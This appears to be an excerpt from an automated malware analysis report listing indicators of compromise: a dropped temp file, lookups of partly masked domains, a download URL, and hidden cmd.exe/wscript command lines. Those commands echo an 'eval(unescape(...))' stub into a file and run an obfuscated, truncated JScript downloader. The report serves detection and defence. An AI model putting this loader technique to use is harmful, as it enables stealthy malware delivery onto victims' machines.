Technical Information
- %TEMP%\76782785.txt
- 'ne####enadhanou.cz':80
- http://www.ne####enadhanou.cz/nvdtime.prs
- DNS ASK ho##or.com
- DNS ASK ne####enadhanou.cz
- '<SYSTEM32>\wscript.exe' /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BfyWg%3D%20%283577%2C%22ty%22+%22pe%22%29%3BjYODh%3D%20%2823716%2C%22%5C%5C%22+%22tmp849094.509%22%29%3BCqPpSX%3D%20%283439%2C%22ht%22+%22t...
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BfyWg%3D%20%283577%2C%22ty%22+%22pe%22%29%3BjYOD...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BfyWg%3D%20%283577%2C%22ty%22+%22pe%22%29%3BjYOD...
- '<SYSTEM32>\timeout.exe' 3